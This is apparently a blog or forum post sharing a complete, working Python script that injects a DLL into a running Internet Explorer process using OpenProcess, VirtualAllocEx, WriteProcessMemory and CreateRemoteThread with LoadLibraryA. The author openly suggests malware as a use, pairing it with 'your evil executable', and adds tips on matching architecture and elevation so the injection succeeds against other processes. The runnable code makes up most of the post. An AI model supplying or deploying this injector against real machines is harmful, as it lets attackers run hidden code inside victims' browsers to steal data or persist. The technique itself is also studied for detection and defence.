I've made a script that will attempt to inject a predefined DLL into the Internet Explorer process on Windows. One application could be in malware: the script assumes you have a DLL called mydll.dll in the same directory as the script (presumably where it was downloaded, together with your evil executable, after you have compiled the script). The technique is the classic one: open the target with OpenProcess, allocate a buffer inside it with VirtualAllocEx, write the DLL path into that buffer with WriteProcessMemory, and then start a thread in the target with CreateRemoteThread whose start address is LoadLibraryA and whose argument is the buffer, so the target loads the DLL itself.
The formatting is a little unconventional because I had a 'print' after each operation in the script for testing purposes; those have since been removed, save for the final print, which together with the last 'else' can be commented out for your convenience. Here's the code for the script:
from win32com.client import GetObject
from ctypes import *
import sys, os

# Python 2 / pywin32 script. WMI is only used to find the target's PID.
Wmi = GetObject('winmgmts:')
# Get the IE process. IE8+ runs one iexplore.exe per tab plus a frame process,
# so the query can return several. ExecQuery returns a collection, not one
# object, so it has to be iterated; we take the first PID it reports.
explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
PIDS = [proc.Properties_('ProcessId').Value for proc in explorer]
if not PIDS:
    print "iexplore.exe is not running"
    sys.exit(1)
PID = PIDS[0]  # Grab its Pid
# Get DLL path. It must be absolute: LoadLibraryA runs inside IE and would
# resolve a bare 'mydll.dll' against IE's own search path, not this directory.
file = 'mydll.dll'
path = os.path.dirname(os.path.abspath(__file__))
DLL_PATH = os.path.join(path, file)
# Define constants we use
PAGE_RW_PRIV = 0x04          # PAGE_READWRITE
PROCESS_ALL_ACCESS = 0x1F0FFF
VIRTUAL_MEM = 0x3000         # MEM_COMMIT | MEM_RESERVE
kernel32 = windll.kernel32
# Declare handle and pointer types so nothing is truncated to 32 bits on x64
kernel32.OpenProcess.restype = c_void_p
kernel32.VirtualAllocEx.restype = c_void_p
kernel32.VirtualAllocEx.argtypes = [c_void_p, c_void_p, c_size_t, c_ulong, c_ulong]
kernel32.WriteProcessMemory.argtypes = [c_void_p, c_void_p, c_char_p, c_size_t, POINTER(c_size_t)]
kernel32.GetModuleHandleA.restype = c_void_p
kernel32.GetProcAddress.restype = c_void_p
kernel32.GetProcAddress.argtypes = [c_void_p, c_char_p]
kernel32.CreateRemoteThread.restype = c_void_p
kernel32.CreateRemoteThread.argtypes = [c_void_p, c_void_p, c_size_t, c_void_p, c_void_p, c_ulong, POINTER(c_ulong)]
LEN_DLL = len(DLL_PATH) + 1  # length of the DLL path including its NUL terminator
hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, PID)
if not hProcess:
    print "Could not open PID %d (error %d)" % (PID, GetLastError())
    sys.exit(1)
# Reserve memory inside IE and copy the DLL path there; it becomes LoadLibraryA's argument
DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess, None, LEN_DLL, VIRTUAL_MEM, PAGE_RW_PRIV)
bool_Written = c_size_t(0)
kernel32.WriteProcessMemory(hProcess, DLL_PATH_ADDR, DLL_PATH, LEN_DLL, byref(bool_Written))
# kernel32 is mapped at the same base in every process of the same bitness
# (ASLR randomises it per boot, not per process), so the LoadLibraryA address
# resolved in our own process is also valid inside IE.
kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")
LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr, "LoadLibraryA")
thread_id = c_ulong(0) # for our thread id
# Run LoadLibraryA(DLL_PATH_ADDR) on a new thread inside IE
hThread = kernel32.CreateRemoteThread(hProcess, None, 0, LoadLibraryA_func_addr, DLL_PATH_ADDR, 0, byref(thread_id))
if not hThread:
    print "CreateRemoteThread failed (error %d)" % GetLastError()
else:
    print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value
Alternatively you can check the script out and download it from GitHub: https://github.com/FernSecurity/DLL-Injector
I've tested it on Windows 7, but the technique works against any Win32 process, with two conditions. First, the DLL, the Python interpreter and the target must all be the same architecture: a 32-bit DLL cannot be loaded into a 64-bit process or vice versa, and 64-bit Windows 7 ships both a 32-bit and a 64-bit iexplore.exe. Second, OpenProcess with PROCESS_ALL_ACCESS must succeed, which it will not for processes owned by another user or running at a higher integrity level than the injector, so an elevated IE needs an elevated injector.
Feel free to modify and/or improve the script; if you do, I'd love to see your work!